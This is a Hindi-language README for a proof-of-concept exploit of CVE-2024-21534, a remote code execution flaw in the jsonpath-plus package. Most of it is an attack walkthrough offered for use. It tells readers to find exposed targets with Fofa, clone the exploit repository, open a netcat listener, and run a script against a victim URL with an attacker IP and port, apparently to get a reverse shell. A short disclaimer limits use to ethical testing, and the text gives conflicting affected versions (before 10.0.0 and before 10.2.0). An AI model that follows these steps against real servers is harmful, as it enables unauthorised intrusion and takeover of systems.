
POC - CVE-2024-21534 Jsonpath-plus अनुचित इनपुट सैनिटाइज़ेशन के कारण रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील है
CVE-2024-21534 jsonpath-plus पैकेज के संस्करण 10.0.0 से पहले के संस्करणों में पाई जाने वाली एक गंभीर भेद्यता है। यह भेद्यता अनुचित इनपुट सैनिटाइज़ेशन के कारण उत्पन्न होती है, जो प्रभावित सिस्टम पर रिमोट कोड निष्पादन (RCE) का कारण बन सकती है। यह भेद्यता विशेष रूप से खतरनाक है क्योंकि इसे बिना प्रमाणीकरण के शोषित किया जा सकता है, जिससे हमलावर विशेष रूप से तैयार इनपुट भेजकर सर्वर पर मनमाना कोड निष्पादित कर सकते हैं। यह समस्या Node.js vm मॉड्यूल के असुरक्षित डिफ़ॉल्ट उपयोग से उत्पन्न होती है, जिसका यदि शोषण किया जाता है, तो पूरे सिस्टम से समझौता हो सकता है।
jsonpath-plus के संस्करण 10.2.0 से पहले के
यह भेद्यता jsonpath-plus पैकेज में स्थित है, जो अनुप्रयोगों में JSON डेटा संरचनाओं को क्वेरी करने के लिए व्यापक रूप से उपयोग किया जाता है। यह दोष अनुचित इनपुट सैनिटाइज़ेशन के कारण है, जो दुर्भावनापूर्ण कोड निष्पादन की अनुमति देता है।
इसके बारे में पढ़ें — CVE-2024-21534
अस्वीकरण: यह प्रूफ ऑफ कॉन्सेप्ट (POC) केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई दायित्व नहीं मानते हैं और इस प्रोग्राम के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
संभावित लक्ष्य खोजने के लिए, Fofa (Shodan.io के समान) का उपयोग करें:
Jsonpath-plus
सबसे पहले, रिपॉजिटरी क्लोन करें:
git clone https://github.com/verylazytech/CVE-2024-21534
अब nc का उपयोग करके एक लिसनर खोलें:
nc -lnvp 443
एक्सप्लॉइट चलाएँ:
सुनिश्चित करें कि URL किसी ऐसे एंडपॉइंट की ओर इंगित करता है जो संवेदनशील jsonpath-plus पैकेज के माध्यम से उपयोगकर्ता इनपुट को संसाधित करता है, क्योंकि यह RCE भेद्यता के शोषण की अनुमति देगा।
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

